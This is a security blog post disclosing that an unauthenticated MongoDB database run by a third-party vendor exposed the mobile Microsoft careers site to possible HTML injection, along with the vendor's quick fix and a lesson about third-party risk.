Microsoft Careers Site Was Vulnerable to AttackBack to blog
An exposed database was serving potentially arbitrary HTML through the mobile version of Microsoft’s careers page (m.careersatmicrosoft.com).
Punchkick Interactive is a mobile web development company. Microsoft relies on Punchkick to handle the database that powers m.careersatmicrosoft.com. The bad news is that, for at least the past few weeks, this backend database has been exposed to the open internet and required no authentication at all to access.
The good news is that as of February 5th, following my disclosure of the vulnerability to Punchkick and Microsoft, everything has been secured. For those curious, there is an overview screenshot of the database in its exposed form included with this post. You’ll notice some other company names in the image, but I focused on Microsoft due to the probability of that portion having the most impact.
All indications are that the database, a MongoDB instance, was not write-protected. You probably see where this is going-- During the exposed timeframe, an attacker could have modified the database, and thus, the HTML code of job listing pages being served through m.careersatmicrosoft.com.
The ability to craft arbitrary HTML into an official Microsoft careers webpage is, to say the least, a powerful find for a would-be malicious hacker. This situation is the classic definition of a potential watering hole attack.
In that scenario, any number of browser exploits could be launched against unsuspecting job-seekers. It would also be a fantastic phishing opportunity, as people seeking jobs at Microsoft probably tend to have higher value credentials.
Speaking of credentials, some of those were part of this exposed Punchkick database. As proof of the severity of the situation, one of my early emails to Microsoft regarding the vulnerability included a screenshot showing the name, email address, password hash, and issued tokens for Microsoft’s Global Employment Brand Marketing Manager, Karrie Shepro. A redacted version of the screenshot is posted along with this article.
My main point of contact at Punchkick Interactive was Charles Portwood. The most recent message I received from him contained, in part, the following:
The Mongo database is ours, but is used for a separate service that is ultimately consumed by the m.careersatmicrosoft.com website. This issue which caused the MongoDB to be exposed publicly has been fixed on our end.
Thanks for reporting to this us so that we could quickly correct it.
Charles R. Portwood II | Punchkick Interactive
He is right about Punchick “quickly” correcting it. I believe there was only one hour between my first email to firstname.lastname@example.org and the database being secured. Punchkick gets points in my book for the quick turnaround, strong password hashing, and generally being very nice. This was an example of excellent incident response.
The lesson to learn here is that if you’re a big name player like Microsoft, it’s acceptable for third-parties to handle mundane operations like job posting webpages. But be aware that a hole in the third-party’s security can quickly become a hole in your security.
Attention - Portions of this article may be used for publication if properly referenced and credit is given to Kromtech Security Center.
Do you have security tips or suggestions? Contact: email@example.com